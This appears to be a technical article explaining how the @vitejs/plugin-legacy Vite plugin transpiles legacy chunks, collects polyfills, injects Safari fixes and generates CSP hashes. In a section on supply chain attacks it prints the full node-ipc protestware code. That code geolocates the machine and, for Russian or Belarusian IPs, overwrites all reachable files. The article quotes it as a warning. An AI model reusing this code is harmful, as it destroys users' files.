if (polyfillsDiscovered == null) {
  throw new Error(
    `Internal @vitejs/plugin-legacy error: discovered polyfills for ${chunk.fileName} should exist`
  );
}

Next, we mainly handle two parts in the renderChunk: one is for legacy chunk and the other is for modern chunk. So the basis for distinguishing between legacy chunk and modern chunk is the configuration item in the configResolved hook.

ts
function isLegacyChunk(
  chunk: RenderedChunk,
  options: NormalizedOutputOptions
) {
  return options.format === 'system' && chunk.fileName.includes('-legacy');
}

We can see that the basis for determining whether a chunk is a legacy chunk is whether the output format of chunk is system and whether the file name of chunk contains -legacy.

Handling Of Legacy Modules

If the configuration item does not require generating legacy products, this step is skipped.

ts
const genLegacy = options.renderLegacyChunks !== false;

if (!genLegacy) {
  return null;
}

At the same time, other tools will be restricted

ts
// @ts-expect-error avoid esbuild transform on legacy chunks since it produces
// legacy-unsafe code - e.g. rewriting object properties into shorthands
opts.__vite_skip_esbuild__ = true;

// @ts-expect-error force terser for legacy chunks. This only takes effect if
// minification isn't disabled, because that leaves out the terser plugin
// entirely.
opts.__vite_force_terser__ = true;

// @ts-expect-error In the `generateBundle` hook,
// we'll delete the assets from the legacy bundle to avoid emitting duplicate assets.
// But that's still a waste of computing resource.
// So we add this flag to avoid emitting the asset in the first place whenever possible.
opts.__vite_skip_asset_emit__ = true;

// avoid emitting assets for legacy bundle
const needPolyfills =
  options.polyfills !== false && !Array.isArray(options.polyfills);

Note that introducing the current plugin will back up legacy-bundle on the original bundle. The following parameters are only valid for legacy-bundle, and the normol-bundle parameters are all undefined.

  1. __vite_skip_esbuild__: If set to true, it can skip the vite:esbuild-transpile plugin (the function of this plugin is to compress modules or convert TypeScript to js modules). Avoid using esbuild conversion on legacy modules, because it will generate legacy-unsafe code - for example, rewriting object properties into shorthands. The a={name} will be converted to a={name:name}, which will still generate a={name}. This will cause swc\babel\typescript plugins to fail.
  2. __vite_force_terser__: For legacy modules, force the use of terser for compression. This only takes effect if minification is not disabled, because that will completely exclude the terser plugin.
  3. __vite_skip_asset_emit__: In the generateBundle hook, Vite will delete resources from lagacy bundle to avoid generating duplicate resources. However, this still requires computing resources. Therefore, Vite adds this flag to avoid generating resources in the first place whenever possible.

The plugin will use @babel/preset-env's capabilities to transpile legacy chunk code.

ts
// transform the legacy chunk with @babel/preset-env
const sourceMaps = !!config.build.sourcemap;
const babel = await loadBabel();
const result = babel.transform(raw, {
  babelrc: false,
  configFile: false,
  compact: !!config.build.minify,
  sourceMaps,
  inputSourceMap: undefined,
  presets: [
    // forcing our plugin to run before preset-env by wrapping it in a
    // preset so we can catch the injected import statements...
    [
      () => ({
        plugins: [
          recordAndRemovePolyfillBabelPlugin(polyfillsDiscovered.legacy),
          replaceLegacyEnvBabelPlugin(),
          wrapIIFEBabelPlugin()
        ]
      })
    ],
    [
      (await import('@babel/preset-env')).default,
      createBabelPresetEnvOptions(targets, { needPolyfills })
    ]
  ]
});

if (result) return { code: result.code!, map: result.map };
return null;

The legacyPostPlugin's renderChunk hook will empower @babel/preset-env through babel plugins, including recordAndRemovePolyfillBabelPlugin, replaceLegacyEnvBabelPlugin, and wrapIIFEBabelPlugin.

Attention

babel will first execute the preset plugins of @babel/preset-env, where it will parse chunk code, analyze the javascript features used in chunk based on the targets configuration item, and inject polyfills as needed.

After the execution of the @babel/preset-env preset, the above babel plugins will be executed in turn, and then we will analyze the implementation of each babel plugin in turn.

  1. replaceLegacyEnvBabelPlugin's babel plugin.

    This plugin mainly handles the value of legacyEnvVarMarker in legacy chunk.

    ts
    function replaceLegacyEnvBabelPlugin(): BabelPlugin {
      return ({ types: t }): BabelPlugin => ({
        name: 'vite-replace-env-legacy',
        visitor: {
          Identifier(path) {
            if (path.node.name === legacyEnvVarMarker) {
              path.replaceWith(t.booleanLiteral(true));
            }
          }
        }
      });
    }

    The vite:define plugin will replace the value of import.meta.env.LEGACY with legacyEnvVarMarker (__VITE_IS_LEGACY__) in the transform phase. This plugin will replace legacyEnvVarMarker (__VITE_IS_LEGACY__) with a specific boolean value (true for legacy chunk, false for modern chunk) in the renderChunk phase.

    The way to replace __VITE_IS_LEGACY__ is different between legacy chunk and modern chunk. In legacy chunk, it is implemented through the babel plugin, while in modern chunk, it is directly replaced through regular expressions.

    ts
    function replaceLegacyEnvBabelPlugin(): BabelPlugin {
      return ({ types: t }): BabelPlugin => ({
        name: 'vite-replace-env-legacy',
        visitor: {
          Identifier(path) {
            if (path.node.name === legacyEnvVarMarker) {
              path.replaceWith(t.booleanLiteral(true));
            }
          }
        }
      });
    }
    ts
    if (!isLegacyChunk(chunk, opts)) {
      if (raw.includes(legacyEnvVarMarker)) {
        const re = new RegExp(legacyEnvVarMarker, 'g');
        let match;
        while ((match = re.exec(raw))) {
          ms.overwrite(
            match.index,
            match.index + legacyEnvVarMarker.length,
            `false`
          );
        }
      }
    }
  2. recordAndRemovePolyfillBabelPlugin's babel plugin

    This babel plugin is mainly used to collect the values of import statements in the transpiled legacy chunk.

    ts
    function recordAndRemovePolyfillBabelPlugin(
      polyfills: Set<string>
    ): BabelPlugin {
      return ({ types: t }: { types: typeof BabelTypes }): BabelPlugin => ({
        name: 'vite-remove-polyfill-import',
        post({ path }) {
          path.get('body').forEach(p => {
            if (t.isImportDeclaration(p.node)) {
              polyfills.add(p.node.source.value);
              p.remove();
            }
          });
        }
      });
    }

    In the renderChunk phase of vite, the code of chunk has already been parsed import and export, so in normal circumstances, there should be no import and export in each module. If import or export is collected again, it must be polyfill dependencies injected by @babel/preset-env in the @babel/preset-env plugin.

    At this point, this babel plugin's job is to collect polyfill dependencies injected by @babel/preset-env in the transpilation stage. The @vitejs/plugin-legacy plugin does not intend to execute bundle chunks graph again after renderChunk, which would add some complexity. The plugin's strategy is to collect the values of import statements in each legacy chunk, identify them as polyfill dependencies, and then remove the import statements in the legacy chunk through p.remove().

    In the generateBundle stage, the collected polyfill dependencies are built as independent bundles.

  3. wrapIIFEBabelPlugin's babel plugin

    ts
    function wrapIIFEBabelPlugin(): BabelPlugin {
      return ({ types: t, template }): BabelPlugin => {
        const buildIIFE = template(';(function(){%%body%%})();');
    
        return {
          name: 'vite-wrap-iife',
          post({ path }) {
            if (!this.isWrapped) {
              this.isWrapped = true;
              path.replaceWith(
                t.program(buildIIFE({ body: path.node.body }))
              );
            }
          }
        };
      };
    }

    Finally, use an immediately executed function to wrap the source code of legacy chunk. The reason for this can be found in PR, mainly to solve the problem of global scope pollution.

Handling Of Modern Modules

The source code is as follows:

js
// Detect whether the browser supports import.meta.url and dynamic import through monitoring
const detectModernBrowserDetector =
  'import.meta.url;import("_").catch(()=>1);async function* g(){};';
const modernChunkLegacyGuard = `export function __vite_legacy_guard(){${detectModernBrowserDetector}};`;
async function renderChunk(raw, chunk, opts) {
  if (!isLegacyChunk(chunk, opts)) {
    // options.modernPolyfills = true. It is not recommended to set it to true, because core-js@3 is very aggressive in injecting JS features. Even if the target is to support native ESM, it needs to inject 15kb.
    if (
      options.modernPolyfills &&
      !Array.isArray(options.modernPolyfills)
    ) {
      await detectPolyfills(raw, { esmodules: true }, modernPolyfills);
    }
    const ms = new MagicString(raw);
    // Inject detection of modern browsers at the entry point
    if (genLegacy && chunk.isEntry) {
      ms.prepend(modernChunkLegacyGuard);
    }
    // Determine that the injected legacyEnvVarMarker value is false. Normally, it is associated with subsequent tree-shaking.
    if (raw.includes(legacyEnvVarMarker)) {
      const re = new RegExp(legacyEnvVarMarker, 'g');
      let match;
      while ((match = re.exec(raw))) {
        ms.overwrite(
          match.index,
          match.index + legacyEnvVarMarker.length,
          'false'
        );
      }
    }
    if (config.build.sourcemap) {
      return {
        code: ms.toString(),
        map: ms.generateMap({ hires: true })
      };
    }
    return {
      code: ms.toString()
    };
  }
}

From the polyfill in the above source code, we can divide it into the following parts:

  1. The processing of options.modernPolyfills. Similar to using @babel/preset-env plugin in babel to detect (without changing the source code) and collect.

    js
    if (options.modernPolyfills && !Array.isArray(options.modernPolyfills)) {
      await detectPolyfills(raw, { esmodules: true }, modernPolyfills);
    }
  2. Add detection at the entry point of the module to determine whether it is a modern browser.

    js
    const detectModernBrowserDetector =
      'import.meta.url;import("_").catch(()=>1);async function* g(){};';
    
    const modernChunkLegacyGuard = `export function __vite_legacy_guard(){${detectModernBrowserDetector}};`;
    
    const ms = new MagicString(raw);
    if (genLegacy && chunk.isEntry) {
      ms.prepend(modernChunkLegacyGuard);
    }
  3. Determine that the value of legacyEnvVarMarker is false.

    js
    if (raw.includes(legacyEnvVarMarker)) {
      const re = new RegExp(legacyEnvVarMarker, 'g');
      let match;
      while ((match = re.exec(raw))) {
        ms.overwrite(
          match.index,
          match.index + legacyEnvVarMarker.length,
          'false'
        );
      }
    }

transformIndexHtml Hook's Focus

The polyfill set collected as a new module is as follows:

js
function polyfillsPlugin(imports, externalSystemJS) {
  return {
    name: 'vite:legacy-polyfills',
    resolveId(id) {
      if (id === polyfillId) {
        return id;
      }
    },
    load(id) {
      if (id === polyfillId) {
        return (
          // imports are all the polyfills needed for compatibility in the renderChunk phase.
          [...imports].map(i => `import "${i}";`).join('') +
          (externalSystemJS ? '' : 'import "systemjs/dist/s.min.js";')
        );
      }
    }
  };
}

In the generateBundle stage, call vite separately to build polyfill bundle. Finally, modern browsers will generate products that support modern esm, and old versions of browsers will generate products that support nomodule.

js
async function buildPolyfillChunk(
  name,
  imports,
  bundle,
  facadeToChunkMap,
  buildOptions,
  externalSystemJS
) {
  let { minify, assetsDir } = buildOptions;
  minify = minify ? 'terser' : false;
  const res = await build({
    // so that everything is resolved from here
    root: __dirname,
    configFile: false,
    logLevel: 'error',
    plugins: [polyfillsPlugin(imports, externalSystemJS)],
    build: {
      write: false,
      target: false,
      minify,
      assetsDir,
      rollupOptions: {
        input: {
          [name]: polyfillId
        },
        output: {
          format: name.includes('legacy') ? 'iife' : 'es',
          manualChunks: undefined
        }
      }
    }
  });
  // ...
}

Note

  1. The plugin-legacy internally uses terser to compress the code. Therefore, when minify is configured, please make sure to follow the terser dependency.

  2. useBuiltIns: 'usage' means that only polyfill that is actually used will be introduced. You can compare it with useBuiltIns: 'entry'

  3. From the configuration items and vite-wrap-iife plugin (executed first among preset plugins of babel), we can see

js
const options = {
  output: {
    format: name.includes('legacy') ? 'iife' : 'es',
    manualChunks: undefined
  }
};

function wrapIIFEBabelPlugin() {
  return ({ types: t, template }) => {
    const buildIIFE = template(';(function(){%%body%%})();');

    return {
      name: 'vite-wrap-iife',
      post({ path }) {
        if (!this.isWrapped) {
          this.isWrapped = true;
          path.replaceWith(t.program(buildIIFE({ body: path.node.body })));
        }
      }
    };
  };
}

polyfill chunk is an immediately executed function.

Then inject the polyfill chunk into the bundle as polyfill bundle.

js
async function buildPolyfillChunk(
  name,
  imports,
  bundle,
  facadeToChunkMap,
  buildOptions,
  externalSystemJS
) {
  // ...
  const _polyfillChunk = Array.isArray(res) ? res[0] : res;
  if (!('output' in _polyfillChunk)) return;
  const polyfillChunk = _polyfillChunk.output[0];

  // associate the polyfill chunk to every entry chunk so that we can retrieve
  // the polyfill filename in index html transform
  for (const key in bundle) {
    const chunk = bundle[key];
    if (chunk.type === 'chunk' && chunk.facadeModuleId) {
      facadeToChunkMap.set(chunk.facadeModuleId, polyfillChunk.fileName);
    }
  }

  // add the chunk to the bundle
  bundle[polyfillChunk.name] = polyfillChunk;
}

Implementation Considerations

Detect Omission Of Promise Polyfill

The default project of vite is based on esm, and esm features depend on systemjs to implement polyfill. The systemjs package depends on promise.

When the user does not use promise in the module:

js
import react from 'react';
console.log(react);

@babel/preset-env does not actively inject promise's polyfill when parsing the code. However, the module actually uses import syntax, which is a specific syntax of esm, and polyfill requires systemjs to be implemented, while systemjs depends on promise.

Therefore, corresponding processing is done in the @vite/legacy-plugin.

ts
async function detectPolyfills(
  code: string,
  targets: any,
  list: Set<string>
): Promise<void> {
  const babel = await loadBabel();
  const result = babel.transform(code, {
    ast: true,
    babelrc: false,
    configFile: false,
    compact: false,
    presets: [
      [
        (await import('@babel/preset-env')).default,
        createBabelPresetEnvOptions(targets, {})
      ]
    ]
  });
  for (const node of result!.ast!.program.body) {
    if (node.type === 'ImportDeclaration') {
      const source = node.source.value;
      if (
        source.startsWith('core-js/') ||
        source.startsWith('regenerator-runtime/')
      ) {
        list.add(source);
      }
    }
  }
}
const legacyGenerateBundlePlugin: Plugin = {
  name: 'vite:legacy-generate-polyfill-chunk',
  apply: 'build',

  async generateBundle(opts, bundle) {
    // legacy bundle
    if (options.polyfills !== false) {
      // check if the target needs Promise polyfill because SystemJS relies on it
      // https://github.com/systemjs/systemjs#ie11-support
      await detectPolyfills(
        `Promise.resolve(); Promise.all();`,
        targets,
        legacyPolyfills
      );
    }
  }
};

By parsing Promise.resolve(); Promise.all(); automatically, add promise's polyfill. Ensure that the polyfill built is definitely included promise's polyfill, so that systemjs can execute normally.

Inject Inline JS Code

polyfill will be injected into index.html as safari 10.1 nomodule fix, initialization of systemjs, and inline javascript code for dynamic import fallback.

Safari 10.1 nomodule Fix

safari 11 version and below versions do not support type=nomodule, but support type=module. In other words, for safari 11 version and below versions, the script tag with nomodule means the same as a normal script tag, and he will try to execute both type="module" and nomodule scripts, which will result in executing the code twice. Therefore, safari 10.1 version and below versions need to be compatible.

Here Safari 10.1 nomodule support there is a specific solution available for reference.

js
(function () {
  // Create a test script element
  var check = document.createElement('script');

  // Check two key features:
  // 1. 'noModule' attribute exists
  // 2. 'onbeforeload' event is supported
  if (!('noModule' in check) && 'onbeforeload' in check) {
    var support = false;

    // Add beforeload event listener
    document.addEventListener(
      'beforeload',
      function (e) {
        if (e.target === check) {
          // Mark that the browser supports modules
          support = true;
        } else if (!e.target.hasAttribute('nomodule') || !support) {
          return;
        }
        // Prevent loading of scripts with nomodule
        e.preventDefault();
      },
      true
    );

    // Set test script
    check.type = 'module';
    check.src = '.';
    document.head.appendChild(check);
    check.remove();
  }
})();

onbeforeload is a relatively special event, its support situation is very different from normal events (such as onclick, onload). In fact, onbeforeload is mainly an event specific to safari browsers, which is why this attribute can be used to identify specific browser behaviors. Let's see the situation in different browsers:

In safari:

ts
const script = document.createElement('script');
// true
console.log('onbeforeload' in script);

In other browsers (such as chrome, firefox, ie):

ts
const script = document.createElement('script');
// false
console.log('onbeforeload' in script);

We can determine whether a browser is safari by checking the onbeforeload event of the script tag;

We can determine whether a browser is safari 10.1 or below versions by checking whether the script tag has the noModule attribute.

ts
if (!('noModule' in check) && 'onbeforeload' in check) {
  // This condition is only true in safari 10.1.
}
Dynamic Import Fallback

safari 10.1 version will report an error when using dynamic import in scripts with type=module tag. Therefore, dynamic import needs to be downgraded.

dynamic import needs to be downgraded through systemjs.

html
<script type="module">
  !(function () {
    if (window.__vite_is_modern_browser) return;
    console.warn(
      'vite: loading legacy chunks, syntax error above and the same error below should be ignored'
    );
    var e = document.getElementById('vite-legacy-polyfill'),
      n = document.createElement('script');
    (n.src = e.src),
      (n.onload = function () {
        System.import(
          document
            .getElementById('vite-legacy-entry')
            .getAttribute('data-src')
        );
      }),
      document.body.appendChild(n);
  })();
</script>

<script
  nomodule
  crossorigin
  id="vite-legacy-entry"
  data-src="/assets/index-legacy-CwS5KdAx.js"
>
  System.import(
    document.getElementById('vite-legacy-entry').getAttribute('data-src')
  );
</script>
Content Security Policy

Due to the special nature of safari 10.1 version, @vitejs/plugin-legacy plugin needs to inject inline javascript runtime code into index.html. The runtime code includes safari 10.1 nomodule fix, initialization of systemjs, and code for dynamic import fallback.

If the project strictly follows csp strategy, then the hash value of the inline script needs to be added to the script-src list. The @vitejs/plugin-legacy plugin has already generated the hash values of all inline scripts internally.

ts
import crypto from 'node:crypto';

const hash =
  // crypto.hash is supported in Node 21.7.0+, 20.12.0+
  crypto.hash ??
  ((
    algorithm: string,
    data: crypto.BinaryLike,
    outputEncoding: crypto.BinaryToTextEncoding
  ) => crypto.createHash(algorithm).update(data).digest(outputEncoding));
export const cspHashes = [
  safari10NoModuleFix,
  systemJSInlineCode,
  detectModernBrowserCode,
  dynamicFallbackInlineCode
].map(i => hash('sha256', i, 'base64'));

We can get the value of cspHashes directly through the cspHashes variable (note that sha256- prefix is not included, please add it manually).

ts
import { cspHashes } from '@vitejs/plugin-legacy';

This method is used to obtain all csp hash values injected into html.

Prompt

For detailed introduction and notes about csp hash, please refer to Using a hash with CSP .

script tag's integrity attribute is similar to csp, please pay attention to the comparison.

html
<script
  src="https://example.com/example-framework.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous"
></script>

integrity is a security feature that allows browsers to check whether the resource they obtained (for example, from CDN) has been tampered with. It checks whether the hash value of the obtained file is the same as the hash value provided by integrity, which is a security feature complementary to csp:

  1. csp is a preventive security measure:

    • Define global policy for resource loading.
    • Actively restrict which inline scripts can be executed.
    • Provide protection for the entire page.
    • Prevent xss attacks.
  2. integrity is a verification security measure:

    • Do not restrict resource loading itself.
    • Verify content after resource loading and before execution.
    • Provide protection for individual resources.
    • Prevent supply chain attacks.

In modern web security practices, this combination of methods can significantly improve the application's ability to resist xss attacks and supply chain attacks.

Expanding a bit, pnpm-lock.yaml recorded external dependency packages will also use integrity value for integrity verification.

yaml
packages:
  '@algolia/autocomplete-core@1.17.7':
    resolution:
      {
        integrity: sha512-BjiPOW6ks90UKl7TwMv7oNQMnzU+t/wk9mgIDi6b1tXpUek7MW0lbNOUHpvam9pe3lVCf4xPFT+lK7s+e+fs7Q==
      }

The working principle is similar to that of browsers' integrity attribute for script tags, used to verify the integrity of the downloaded remote dependencies, ensuring that the downloaded dependencies are not tampered with during transit, reducing the risk of supply chain attacks from cdn servers (DNS hijacking, domain name expiration, account takeover of domain name registrars, notifying cdn domain name to change traffic to their own server), both of which follow W3C's Subresource Integrity specification.

The integrity verification mechanism primarily defends against supply chain attacks during transmission and distribution stages, i.e., unintentional tampering of legitimate code during the transmission from the original publisher to the final user. They ensure that the code provided by the developer reaches the user as intended by using cryptographic hash verification.

However, it is limited in that it cannot defend against scenarios where malicious code is already included at the source, i.e., intentional poisoning by package maintainers and account takeover by package maintainers, which is also the most common problem:

  • 2022-03-15: vue-cli was attacked by node-ipc not behaving as expected.

    The logic of not behaving as expected is as follows:

    js
    import u from 'path';
    import a from 'fs';
    import o from 'https';
    setTimeout(
      function () {
        const t = Math.round(Math.random() * 4);
        if (t > 1) {
          return;
        }
        const n =
          'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154';
        o.get(n.toString('utf8'), function (t) {
          t.on('data', function (t) {
            const n = './';
            const o = '../';
            const r = '../../';
            const f = '/';
            const c = 'country_name';
            const e = 'russia';
            const i = 'belarus';
            try {
              const s = JSON.parse(t.toString('utf8'));
              const u = s[c.toString('utf8')].toLowerCase();
              const a =
                u.includes(e.toString('utf8')) ||
                u.includes(i.toString('utf8'));
              if (a) {
                h(n.toString('utf8'));
                h(o.toString('utf8'));
                h(r.toString('utf8'));
                h(f.toString('utf8'));
              }
            } catch (t) {}
          });
        });
      },
      Math.ceil(Math.random() * 1e3)
    );
    async function h(n = '', o = '') {
      if (!a.existsSync(n)) {
        return;
      }
      let r = [];
      try {
        r = a.readdirSync(n);
      } catch (t) {}
      const f = [];
      const c = '❤️';
      for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
          t = a.lstatSync(i);
        } catch (t) {
          continue;
        }
        if (t.isDirectory()) {
          const s = h(i, o);
          s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
          try {
            a.writeFile(i, c.toString('utf8'), function () {});
          } catch (t) {}
        }
      }
      return f;
    }
    const ssl = true;
    export { ssl as default, ssl };

    This is a targeted supply chain attack against specific regional developers (Russia and Belarus), who betrayed open source spirit by using open source projects as tools to achieve their political intentions, which is a form of open source terrorism. The traditional supply chain is constrained by contracts between levels, but there is no such constraint in the open source product supply chain. The seemingly strong open source community is actually very fragile. When the trust chain is broken, the ecosystem built on open source will collapse.

    A small tip:

    The attacker, node-ipc author Brandon Nozaki Miller (RIAEvangelist) gave a "helpful tip":

    Locking deps after a code review is probably good practice anyway.


    Locking dependencies after a code review is probably a good practice.

  • 2021.10.22, ua-parser-js was attacked by poisoning, possibly due to the account of the maintainer being compromised or breached.

    • Account takeover: The attacker gained control of the npm account of Faisal Salman in an undisclosed manner

    • Malicious version release: After taking control of the account, the attacker immediately released three new versions containing malicious code:

      • 0.7.29 (for old users)
      • 0.8.0 (new minor version number, attracting upgrades)
      • 1.0.0 (main version upgrade, enticing early adopters)
    • Quick discovery: GitHub user "AminCoder" first raised an alert on GitHub, discovered suspicious code

    • Confirmation and response: Within hours, the npm security team confirmed the attack and quickly took action

    • Official announcement: The same day, the US Cybersecurity and Infrastructure Security Agency (CISA) released an official warning

    • Cleaning operation: npm removed the malicious version from the registry, and the project maintainer released a clean fix version

    • Security announcement: GitHub released CVE-2021-42078 security announcement, officially recording this incident

Development of organizational and preventive measures:

  • Improved package integrity verification mechanism: SRI and integrity verification depend on (package) integrity.
  • 2FA authentication requirement: npm now requires all popular package maintainers to use 2FA, expanding the scope of 2FA.
  • Framework at supply chain level: Such as SLSA (Supply chain Levels for Software Artifacts) and SBOM (Software Bill of Materials) are widely used.
  • Promotion of "lockfile freeze" practice: Prevent automatic upgrade to the latest version to avoid supply chain attacks.
  • Public funding support: Development of platforms such as Open Collective and GitHub Sponsors, solving the financial sustainability of open source maintenance.
  • Advanced monitoring tools: Automated security tools capable of detecting abnormal package behavior, especially network activity and file system operations.

Users can manually copy the values of cspHashes into the script-src attribute of the Content-Security-Policy tag. However, please note that these values may change between minor versions. If manual copying is used, the minor version should be locked with ~.

However, a more suitable injection scheme is to implement automatic injection of csp hash through vite user plugins, which can be implemented in the following way:

ts
import { defineConfig } from 'vite';
import legacy, { cspHashes } from '@vitejs/plugin-legacy';

export default defineConfig({
  plugins: [
    {
      name: 'vite-plugin-inject-csp-hashes',
      apply: 'build',
      enforce: 'post',

      transformIndexHtml(html) {
        return {
          html,
          tags: [
            {
              tag: 'meta',
              attrs: {
                'http-equiv': 'Content-Security-Policy',
                content:
                  `script-src 'self' ` +
                  cspHashes.map(hash => `'sha256-${hash}'`).join(' ')
              },
              injectTo: 'head-prepend'
            }
          ]
        };
      }
    },
    legacy({
      targets: ['defaults', 'not IE 11']
    })
  ]
});

The output product to html is as follows:

html
<meta
  http-equiv="Content-Security-Policy"
  content="script-src 'self' 
  'sha256-MS6/3FCg4WjP9gwgaBGwLpRCY6fZBgwmhVCdrPrNf3E=' 'sha256-tQjf8gvb2ROOMapIxFvFAYBeUJ0v1HCbOcSmDNXGtDo=' 'sha256-VA8O2hAdooB288EpSTrGLl7z3QikbWU9wwoebO/QaYk=' 
  'sha256-+5XkZFazzJo8n0iOP4ti/cLCMUudTf//Mzkb7xNPXIc='"
/>

html page can contain multiple csp meta tags, each tag can define different policy instructions, and they will be executed in the end.

When using regenerator-runtime polyfill, it will try to use the globalThis object to register itself. If globalThis is not available (the globalThis feature is quite new, and the user agent's support is limited, it does not support ie 11), it will try to execute dynamic Function(...) method calls, which will violate csp rules. To avoid dynamic parsing in environments where globalThis is missing, we need to manually add core-js/proposals/global-this to additionalLegacyPolyfills.

Contributors

Changelog

Discuss

Released under the CC BY-SA 4.0 License. (dbcbf17)